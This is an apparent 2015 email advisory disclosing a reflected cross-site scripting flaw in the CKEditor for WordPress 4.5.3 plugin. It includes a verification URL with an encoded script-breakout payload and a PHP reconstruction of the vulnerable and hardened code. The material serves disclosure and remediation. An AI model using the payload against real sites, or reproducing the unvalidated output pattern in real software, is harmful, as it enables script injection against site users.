Subject: Cross-Site Scripting (XSS) in CKEditor for WordPress 4.5.3
Date: Mon, 31 Aug 2015 11:35:12 +0200

Hello,

Plugin: CKEditor for WordPress 4.5.3 https://wordpress.org/plugins/ckeditor-for-wordpress/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (such as editors) can inject HTML/JS code (there is no CSRF protection!). Please note that the plugin configuration value "File browser" needs to be set to "Built-in (old)" for successful exploitation.

Method: GET
Url: http://localhost/wp-content/plugins/ckeditor-for-wordpress/filemanager/connectors/php/upload.php?CKEditorFuncNum=[xss]
Vulnerable parameters: CKEditorFuncNum

Example PHP callstack:
SendUploadResults   [/ckeditor-for-wordpress/filemanager/connectors/php/io.php:301]

Verification:
http://localhost/wp-content/plugins/ckeditor-for-wordpress/filemanager/connectors/php/upload.php?CKEditorFuncNum=%29%3C/script%3E%3Cimg%20src=x%20onerror=alert%281%29%20/%3E%3C/script%3E
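As an added illustration (not the plugin's code), the snippet below reconstructs the shape of the bug: the CKEditorFuncNum value is echoed straight into a script block that calls back into the editor, so a value containing `)</script>` breaks out of the script context. The function names, the callback signature and the sample file URL are assumptions for the example; only the parameter name comes from the advisory.

```php
<?php
// Added example, not the plugin's code: a simplified reconstruction of the
// pattern behind the finding. Function names and the callFunction() argument
// list are assumed; only the parameter name CKEditorFuncNum is from the report.

// Vulnerable shape: the callback number is interpolated unvalidated into a
// <script> element. A value such as  )</script><img src=x onerror=alert(1)>
// terminates the script and the browser renders the injected markup.
function render_upload_result_vulnerable(string $funcNum, string $fileUrl, string $error): string
{
    return '<script type="text/javascript">'
         . "window.parent.CKEDITOR.tools.callFunction($funcNum, '$fileUrl', '$error');"
         . '</script>';
}

// Hardened shape:
//  1. CKEditorFuncNum is an index into CKEditor's callback table, so anything
//     other than a non-negative integer is rejected before reaching the output.
//  2. String arguments are emitted with json_encode() plus JSON_HEX_TAG and
//     friends, so "</script>", quotes and ampersands cannot leave the script
//     context.
// Returns null for a rejected request; the caller should answer with HTTP 400.
// In a WordPress plugin the endpoint should additionally check a capability
// and a nonce (current_user_can() / wp_verify_nonce()), which the advisory
// notes is absent; that check is outside this example.
function render_upload_result_hardened(string $funcNum, string $fileUrl, string $error): ?string
{
    // FILTER_VALIDATE_INT rejects "1)</script>", "1e3", " 1" and similar.
    $num = filter_var($funcNum, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($num === false) {
        return null;
    }
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<script type="text/javascript">'
         . 'window.parent.CKEDITOR.tools.callFunction('
         . $num . ', ' . json_encode($fileUrl, $flags) . ', ' . json_encode($error, $flags)
         . ');</script>';
}

// Demonstration with the (URL-decoded) value from the advisory's verification URL.
$payload = ')</script><img src=x onerror=alert(1) /></script>';
echo "vulnerable: ", render_upload_result_vulnerable($payload, '/uploads/x.png', ''), PHP_EOL;
var_dump(render_upload_result_hardened($payload, '/uploads/x.png', ''));   // NULL: rejected
echo "hardened:   ", render_upload_result_hardened('3', '/uploads/x.png', ''), PHP_EOL;
```

The integer check is the decisive fix here: once the callback number can only be a digit string, the encoded string arguments are defence in depth rather than the last line.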

-- 
Regards,
Marcin Probola,